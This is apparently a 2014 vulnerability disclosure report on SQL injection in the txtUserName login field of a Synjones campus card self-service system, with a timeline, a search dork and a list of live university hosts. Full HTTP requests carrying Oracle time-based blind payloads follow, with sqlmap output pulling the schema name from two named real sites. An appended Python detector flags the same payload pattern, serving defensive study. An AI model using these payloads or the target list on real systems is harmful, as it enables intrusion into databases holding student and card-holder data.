2014-09-30: Details reported to the vendor; awaiting the vendor's handling.
2014-10-05: Vendor actively ignored the vulnerability; details opened to third-party security partners.
2014-11-29: Details disclosed to core white hats and experts in the relevant field.
2014-12-09: Details disclosed to ordinary white hats.
2014-12-19: Details disclosed to intern white hats.
2014-12-26: Details disclosed to the public.
...
Copyright holder: Zhengzhou Synjones Electronic Technology Co., Ltd. (郑州新开普电子技术有限公司)
Baidu dork: 一卡通自助查询管理系统--首页 ("Campus card self-service query management system -- Home")
Vulnerable page: UserLogin.aspx (the user login form)
Vulnerable parameter: txtUserName
Stack: ASP.NET (.aspx) + Oracle
Collected cases:
http://ecard.sdut.edu.cn/
http://ecard.bzmc.edu.cn/
http://ecard.sdca.edu.cn/
http://59.173.236.220/SelfSearch/Default.aspx
http://202.115.192.98/SelfSearch/
http://ykt.szetop.com/SelfSearch/
http://yktweb.cqie.cn/default.aspx
http://www.zhengzhong.cn/selfsearch/
http://221.224.167.141/selfsearch/
http://zzcx.scujjedu.cn:114/
http://202.101.244.45/selfsearch/
Proof of vulnerability

1# http://ecard.sdut.edu.cn
Test data (the "*" in txtUserName is the injection marker passed to sqlmap):

POST /UserInfo/UserLogin.aspx HTTP/1.1
Host: ecard.sdut.edu.cn
Proxy-Connection: keep-alive
Content-Length: 511
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ecard.sdut.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ecard.sdut.edu.cn/UserInfo/UserLogin.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=mczm4gqd5k5bqknbrab5phbc

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTczODI0OTkzNQ9kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6%2Fljp%2Flm6A6ZGQCAw8PFgIfAQVC5p%2Bl6K%2Bi57uT5p6c5Li656m677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9bp5K80l7EDTTWuKi4%3D&__EVENTVALIDATION=%2FwEWBgKwwJj9CQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDImwNsGU0pQlSSMzEwopYl%2FPMVGy&txtUserName=*&txtPwd=123123&txtCheckCode=6174&btnUserLogin=
Test result (sqlmap output; the characters C / CENSE interleaved with the log lines are the schema name being retrieved one character at a time):

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTczODI0OTkzNQ9kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6/ljp/lm6A6ZGQCAw8PFgIfAQVC5p+l6K+i57uT5p6c5Li656m677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9bp5K80l7EDTTWuKi4=&__EVENTVALIDATION=/wEWBgKwwJj9CQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWHDQLJk9/kDImwNsGU0pQlSSMzEwopYl/PMVGy&txtUserName=%' AND 6545=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(109)||CHR(118)||CHR(84),5)--&txtPwd=123123&txtCheckCode=6174&btnUserLogin=
---
[09:35:55] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:35:55] [INFO] fetching current database
[09:35:55] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[09:36:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
C
[09:36:24] [INFO] adjusting time delay to 1 second due to good response times
CENSE
[09:36:52] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'CCENSE'
[09:36:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ecard.sdut.edu.cn'
[*] shutting down at 09:36:52
2# http://zzcx.scujjedu.cn:114/
Test data:

POST /UserInfo/UserLogin.aspx HTTP/1.1
Host: zzcx.scujjedu.cn:114
Proxy-Connection: keep-alive
Content-Length: 335
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://zzcx.scujjedu.cn:114
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://zzcx.scujjedu.cn:114/UserInfo/UserLogin.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=wsjzdsiykimw1w55yaq4oy55

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTUwNTExNDEzMg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt%2BWQje%2B8mmRkZM%2BiPW9TLYnRwd1iqTJB7MVAWXC%2B&txtUserName=*&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION=%2FwEWBgLp%2F6GKAQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDPlibsNXwBfNBpqqwnX79i55Bk1M
Test result:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTUwNTExNDEzMg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt+WQje+8mmRkZM+iPW9TLYnRwd1iqTJB7MVAWXC+&txtUserName=%' AND 1858=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(116)||CHR(69)||CHR(87),5)--&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION=/wEWBgLp/6GKAQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWHDQLJk9/kDPlibsNXwBfNBpqqwnX79i55Bk1M
---
[09:46:39] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:46:40] [INFO] fetching current database
[09:46:40] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[09:47:00] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[09:47:09] [INFO] adjusting time delay to 2 seconds due to good response times
[09:47:09] [ERROR] invalid character detected. retrying..
[09:47:09] [WARNING] increasing time delay to 3 seconds
[09:47:18] [ERROR] invalid character detected. retrying..
[09:47:18] [WARNING] increasing time delay to 4 seconds
CCENSE
[09:48:42] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'CCENSE'
[09:48:42] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\zzcx.scujjedu.cn'
[*] shutting down at 09:48:42
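As an added defender-side example (not part of the original report and not the vendor's code): a Python check that scores a login POST body for the Oracle time-based blind pattern sqlmap reported for txtUserName in both cases above. The parameter name comes from the report; the sample bodies are constructed, and reading the leading %' as a LIKE-pattern breakout is an inference from the payload, not something the report states.

```python
import re
from urllib.parse import parse_qs

# Indicators matching the payload sqlmap reported for txtUserName above:
# a quote breakout ("%'" suggests the value lands inside a LIKE pattern; an
# inference from the payload, not confirmed by the report), an Oracle delay
# primitive, CHR()||CHR() string building, and a trailing "--" comment.
QUOTE_BREAKOUT = re.compile(r"^[^']*'\s*(AND|OR)\b", re.I)
ORACLE_DELAY = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I)
CHR_CONCAT = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))+", re.I)
COMMENT_TAIL = re.compile(r"--\s*$")

def decode_chr_concat(expr: str) -> str:
    """Render CHR(106)||CHR(109)||... as the text it builds, for the analyst."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", expr, re.I))

def analyse_login_body(body: str, param: str = "txtUserName") -> dict:
    """Score one application/x-www-form-urlencoded login body.

    Two or more independent indicators on the same field count as an
    injection attempt; a lone apostrophe (an O'Brien) is not enough.
    """
    value = parse_qs(body, keep_blank_values=True).get(param, [""])[0]
    hits = []
    if QUOTE_BREAKOUT.search(value):
        hits.append("quote-breakout")
    if ORACLE_DELAY.search(value):
        hits.append("oracle-delay")
    chr_match = CHR_CONCAT.search(value)
    if chr_match:
        hits.append("chr-concat:" + decode_chr_concat(chr_match.group(0)))
    if COMMENT_TAIL.search(value):
        hits.append("comment-tail")
    return {"value": value, "hits": hits, "suspicious": len(hits) >= 2}

# Constructed sample bodies, URL-encoded as they would arrive on the wire.
SAMPLE_BODIES = {
    "benign": "txtUserName=2012010101&txtPwd=123123&txtCheckCode=6174&btnUserLogin=",
    "apostrophe": "txtUserName=O%27Brien&txtPwd=secret&txtCheckCode=1111&btnUserLogin=",
    "sqlmap_time_based": (
        "txtUserName=%25%27+AND+6545%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29"
        "%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%2884%29%2C5%29--"
        "&txtPwd=123123&txtCheckCode=6174&btnUserLogin="
    ),
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, analyse_login_body(body))
```

The decoded pipe name (jmvT in case 1, itEW in case 2) is the random token sqlmap waits on; logging it lets an analyst correlate the requests of one scan run.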
Risk level: no impact (vendor ignored)
Ignored at: 2014-12-26 11:34
None yet.